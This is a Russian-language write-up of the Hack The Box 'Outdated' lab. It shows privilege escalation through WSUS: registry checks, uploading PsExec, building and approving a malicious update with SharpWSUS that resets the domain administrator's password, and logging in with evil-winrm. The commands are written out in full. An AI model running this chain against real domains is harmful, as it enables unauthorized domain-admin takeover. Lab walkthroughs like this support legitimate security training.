В предыдущей статье, в рамках прохождения Hack The Box Outdated, мы рассмотрели атаку Shadow Credentials и инструмент Whisker. Сегодня рассмотрим технику эскалации через WSUS.
Еще по теме: Пример пентеста Active Directory HTB Intelligence
Вредоносное обновление для смены пароля администратора
Вернемся к группе администраторов WSUS. Мы можем управлять службой WSUS, но прежде, чем говорить о повышении привилегий, нам нужно проверить еще два параметра.
Первый — обновления запрашиваются без использования SSL:
|
1 |
shell reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer |
Второй — игнорируется ли запись WUServer:
|
1 |
shell reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer |
Условия соблюдены, поэтому мы можем использовать технику эскалации через WSUS. Сначала загружаем на хост PsExec64.exe.
|
1 |
upload /home/ralf/tmp/PsExec64.exe C:\Windows\Tasks\PsExec64.exe |
SharpWSUS — это инструмент CSharp для сетевого перемещения Lateral Movement через WSUS (см. ссылку выше).
Теперь c помощью SharpWSUS создаем вредоносное обновление, которое изменит пароль администратора.
|
1 |
.\SharpWSUS.exe create /payload:"C:\Windows\Tasks\PsExec64.exe" /args:'-accepteula -s -d cmd.exe /c "net user administrator !QA@WS3ed4rf"' /title:"newWSUS" |
Теперь развернем наше обновление.
|
1 |
.\SharpWSUS.exe approve /updateid:b8947333-f662-4d7a-832f-f2f4700df828 /computername:dc.outdated.htb /groupname:"newgroup1" |
|
1 |
.\SharpWSUS.exe check /updateid:b8947333-f662-4d7a-832f-f2f4700df828 /computername:dc.outdated.htb |
И проверяем его статус.
Обновление прошло успешно, поэтому можем подключиться по WinRM и забрать флаг рута.
|
1 |
evil-winrm -i dc.outdated.htb -u Administrator -p '!QA@WS3ed4rf' |
ПОЛЕЗНЫЕ ССЫЛКИ:
